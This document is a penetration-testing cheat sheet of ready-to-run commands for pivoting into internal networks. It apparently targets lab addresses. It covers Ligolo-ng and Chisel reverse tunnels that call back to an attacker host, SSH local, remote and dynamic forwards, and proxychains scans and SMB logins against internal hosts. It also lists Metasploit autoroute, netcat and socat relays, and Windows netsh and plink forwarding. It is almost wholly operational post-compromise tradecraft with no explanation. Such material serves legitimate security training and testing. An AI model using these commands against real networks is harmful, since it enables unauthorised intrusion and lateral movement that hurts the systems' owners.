Pivot into internal networks — Ligolo-ng, Chisel, SSH local/remote/dynamic forwards & ProxyJump, proxychains, Metasploit autoroute/socks, socat/netcat relays and native Windows netsh/plink forwarding.
./proxy -selfcert -laddr 0.0.0.0:11601
./agent -connect 10.10.14.1:11601 -ignore-cert
sudo ip route add 10.10.20.0/24 dev ligolo
ligolo> session -> start
ligolo> listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444
./chisel server -p 8000 --reverse
./chisel client 10.10.14.1:8000 R:socks
./chisel client 10.10.14.1:8000 R:3389:127.0.0.1:3389
./chisel client 10.10.14.1:8000 8080:10.10.20.5:80
ssh -D 1080 -fN user@pivot
ssh -L 8080:10.10.20.5:80 -fN user@pivot
ssh -R 8080:127.0.0.1:80 -fN [email protected]
ssh -J user@pivot [email protected]
echo 'socks5 127.0.0.1 1080' >> /etc/proxychains4.conf
proxychains -q nmap -sT -Pn -n 10.10.20.5
proxychains -q nxc smb 10.10.20.0/24 -u user -p pass
proxychains -q xfreerdp /v:10.10.20.5 /u:user
run autoroute -s 10.10.20.0/24
portfwd add -l 3389 -p 3389 -r 10.10.20.5
use auxiliary/server/socks_proxy; run
socat TCP-LISTEN:8080,fork TCP:10.10.20.5:80
mkfifo /tmp/f; nc -lvp 8080 < /tmp/f | nc 10.10.20.5 80 > /tmp/f
netsh interface portproxy add v4tov4 listenport=3389 connectaddress=10.10.20.5 connectport=3389
plink.exe -R 8080:127.0.0.1:80 [email protected] -pw pass
chisel.exe client 10.10.14.1:8000 R:socks